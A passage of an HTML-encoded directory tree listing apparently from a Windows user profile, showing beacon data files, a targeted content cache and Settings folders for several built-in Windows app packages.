&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 314559
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1755293091
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; eventbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 338387
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1755294915
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; eventbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 338388
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1755711455
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1755711469
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; eventbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 338389
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1755294016
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; eventbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 353694
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1755295235
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; eventbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 353698
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1755293234
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; eventbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 88000045
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1755294915
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; eventbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 88000161
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1755293235
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; eventbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 88000163
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1755293235
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; eventbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 88000165
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 1755293236
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; eventbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; onesettings_waas_featuremanagement
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; eventbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; imprbeacons.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TargetedContentCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; v3
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 202914
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 33d8242400b04f2e80ee4d816436b7c1_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 280810
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 300141ca5a7e4ffba3907ec72da19b87_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 280811
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 0b1bdfb5c36c4a8091ba720eb0e18f98_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 280815
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; a57f9c60b1844fa8bf882ca8cb0b6a9d_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 310091
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 1b3ef5fe7363440a82081ea99dc49245_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 314559
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 794e729e90bf435d8428068ed135eec2_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ec6021da066143f390fad8a1e91d813c_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 338387
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 5570d9a7dd8c48ccb199b57f9330290c_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 61b011354cc24a59aacbef6f5a706794_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; d828356c2b92448882c0af5d4241ffa7_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 338388
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ec06d6f16b254ddbbc331cfbcde4318d_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 338389
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 56c3b098abed495fbb78d15ffabbf18f_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 353698
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 1fce59339cfb42abbd7562eccb2571ec_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 88000045
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 895b1f6f08954731aed20e1f50664212_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 88000161
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 9edd036068944692b3b0f386bacfe26e_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9500;&#9472;&#9472; 88000163
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 900bf22aa608441eb406fb99541832fe_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; 88000165
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; f2185c14748648adb3c14ad88cebd930_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settings.dat.LOG1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat.LOG2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.WindowsMaps_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; roaming.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Settings
